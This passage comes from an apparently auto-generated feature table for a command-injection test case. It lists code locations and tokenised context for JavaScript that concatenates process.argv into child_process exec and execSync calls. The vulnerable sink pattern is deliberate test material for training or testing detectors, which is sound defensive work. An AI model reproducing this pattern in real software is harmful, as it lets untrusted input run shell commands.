autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | cp.exec ... rgv[1]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | exceptional return of cp.exec ... rgv[1]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | exceptional return of cp.exec ... rgv[1]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | exceptional return of cp.exec ... rgv[1]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | exceptional return of cp.exec ... rgv[1]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | exceptional return of cp.exec ... rgv[1]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:5:7:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:5:7:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:5:7:8 | exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:5:7:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:5:7:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:18 | "cmd.sh " | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- process.argv.1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:10:7:36 | "cmd.sh ... argv[1] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:28 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:28 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:28 | process | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:28 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:28 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:33 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:33 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:33 | process.argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:33 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:33 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:36 | process.argv[1] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:36 | process.argv[1] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:36 | process.argv[1] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:36 | process.argv[1] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:36 | process.argv[1] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:22:7:36 | process.argv[1] | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:30:7:33 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:30:7:33 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:30:7:33 | argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:30:7:33 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:30:7:33 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:35:7:35 | 1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:35:7:35 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:35:7:35 | 1 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:35:7:35 | 1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:35:7:35 | 1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:8 | cp.exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | cp.exec ... rgv[2]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | cp.exec ... rgv[2]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | cp.exec ... rgv[2]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | cp.exec ... rgv[2]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | cp.exec ... rgv[2]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | exceptional return of cp.exec ... rgv[2]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | exceptional return of cp.exec ... rgv[2]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | exceptional return of cp.exec ... rgv[2]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | exceptional return of cp.exec ... rgv[2]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | exceptional return of cp.exec ... rgv[2]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:5:8:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:5:8:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:5:8:8 | exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:5:8:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:5:8:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:18 | "cmd.sh " | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- process.argv.2 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:28 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:28 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:28 | process | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:28 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:28 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:33 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:33 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:33 | process.argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:33 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:33 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:36 | process.argv[2] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:36 | process.argv[2] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:36 | process.argv[2] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:36 | process.argv[2] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:36 | process.argv[2] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:22:8:36 | process.argv[2] | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:30:8:33 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:30:8:33 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:30:8:33 | argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:30:8:33 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:30:8:33 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:35:8:35 | 2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:35:8:35 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:35:8:35 | 2 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:35:8:35 | 2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:35:8:35 | 2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:9 | args | contextFunctionInterfaces | | +| 